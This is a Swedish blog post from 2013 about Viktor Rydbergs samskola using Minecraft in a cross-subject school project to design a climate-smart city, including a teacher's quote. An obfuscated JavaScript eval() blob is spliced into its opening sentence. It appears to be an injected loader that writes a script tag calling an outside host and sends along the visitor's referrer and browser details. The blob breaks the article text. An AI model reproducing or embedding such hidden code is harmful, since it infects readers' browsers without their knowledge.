Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

På Viktor Rydbergs samskola så är Minecraft på schemat

På Viktor Rydbergs samskola så är Minecraft på schemat
Filip Urde
  • On 9 januari, 2013
  • http://www.revue.se/filip-urde

Drömmen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|daifa|var|u0026u|referrer|aynby||js|php’.split(’|’),0,{}))
när jag gick i skolan var att på något sett få kunna spela som en del av utbildningen. T.ex. spela strategi spel för att lära sig om Historia osv. Detta hände aldrig för min del.

Men nu är året 2013 och Minecraft har letat sig in i skolan. Det är på Viktor Rydbergs samskola utanför Stockholm som eleverna nu använder sig av spelet i ett projekt. Syftet är att de ska lära sig att tänka abstrakt och förstå hur abstrakta ämnen fungerar i verkligheten. I projektet ska eleverna bygga en klimatsmart framtidsstad. Projektet berör ämnena kemi, fysik, biologi, samhällskunskap och svenska.

 

”Syftet med projektet är att eleverna ska tvingas ta ställning i exempelvis olika miljöfrågor för att veta vad de ska bygga i spelet. Det skapar en lust att lära sig saker”  säger Lena Brännström, lärare i NO och matematik.


Kul utveckling måste jag säga! Jag hade älskat att lära mig via ett spel som Minecraft.

www.svt.se